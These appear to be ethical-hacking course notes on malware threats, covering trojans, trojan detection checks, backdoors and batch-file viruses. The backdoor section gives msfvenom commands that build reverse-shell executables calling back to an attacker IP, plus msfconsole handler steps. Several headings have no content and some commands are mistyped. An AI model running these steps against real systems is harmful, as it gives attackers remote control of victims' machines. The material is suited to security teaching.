Malware Threats

What is a Malware?

It is a program in which the malicious or harmful code is contained inside

apparently harmless programming or data in such a way that it can get
control and cause damage, such as ruining the file allocation table on
your hard disk.

Ex: Trojans, Viruses, Adware, Spyware, Ransomware etc;

What is a Trojan?

It is a program which looks and behaves like a good file in terms of

filename and extension, but when victim believes it as a good file if he
executes. This is try to steal victims information and sends back to
attacker.

Trojan replicate, spread, and get activated upon users certain

predefined actions.
Communication Paths
Indications of Trojan Attack
Ways to infect a Target
Trojan Creation
Trojan Detection

1. Scan for suspicious OPEN PORTS

2. Scan for suspicious RUNNING PROCESSESS
3. Scan for suspicious DEVICE DRIVERS INSTALLED
4. Scan for suspicious REGISTRY ENTRIES
5. Scan for suspicious WINDOWS SERVICES
6. Scan for suspicious STARTUP PROGRAMS
7. Scan for suspicious FILES AND FOLDERS
8. Scan for suspicious NETWORK ACTIVITIES
Open ports Checking
Process Checking
Suspicious Driver Check
Backdoor

A backdoor in a computer system is a method of bypassing

normal authentication, securing unauthorized remote access to a computer,
obtaining access to plaintext, and so on, while attempting to remain undetected.
Creating Backdoor using msfvenom
msfvenom p <payload name> LHOST=<Attacker IP>
LPORT=<Attacker PORT> -f format -o <filename.exe>

msfvenom -p windows/shell_reverse_tcp LHOST=49.204.12.355

LPORT=7777 f exe o backdoor.exe

msfvenom -p linux/x86/shell_reverse_tcp LHOST=49.204.12.355

LPORT=7777 f elf o backdoor
Accessing Backdoor with msfconsole

Service postgresql start

msfconsole
use multi/handler
set payload <Payload>
set LHOST <Attacker IP>
set LPORT <Attacker PORT>
exploit
Viruses
VIRUS stands for Vital information resource under seize

Which simplifies the definition of virus to a small concept of destroying or damaging something
Creating A Virus Using Batch file
programming or bash commands
Batch file programming is a useful concept to automate several jobs in windows operating
system, which means the repetitive tasks can be written in a file by administrators to simplify
the job just by running the file instead of executing every command one after another.
Similarly in Linux also we can use either shell scripting or you can write a series of commands
one after another in a file so when you execute all the command will be executed
automatically whenever an administrator wants.

Hacker are going to use these batch and bash scripting knowledge to create dangerous
viruses which can destroy data on a victim machine or can consume all the PC resources to
make the PC either crash or slow down.
Creating a Complicated Virus
People who have strong programming knowledge they can create their own Viruses easily
Source : Internet